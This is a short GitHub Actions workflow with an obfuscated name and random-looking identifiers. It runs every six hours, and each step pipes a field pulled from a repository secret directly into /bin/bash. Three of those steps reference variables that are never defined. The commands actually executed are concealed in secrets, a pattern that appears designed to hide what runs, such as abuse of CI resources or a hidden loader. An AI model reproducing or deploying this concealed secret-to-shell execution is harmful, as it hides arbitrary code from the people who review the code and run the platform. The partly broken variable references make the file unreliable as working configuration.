name: trusteedartboard
on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: trusteedartboard
        env:
          b561: ${{ secrets.b561 }}
        run: |
          echo $b561 | jq -r .ehs9433 | /bin/bash
          echo $mnhj28726 | jq -r .n88 | /bin/bash
          echo $rnju927 | jq -r .hycmm8133 | /bin/bash
          echo $j85 | jq -r .jfc735 | /bin/bash

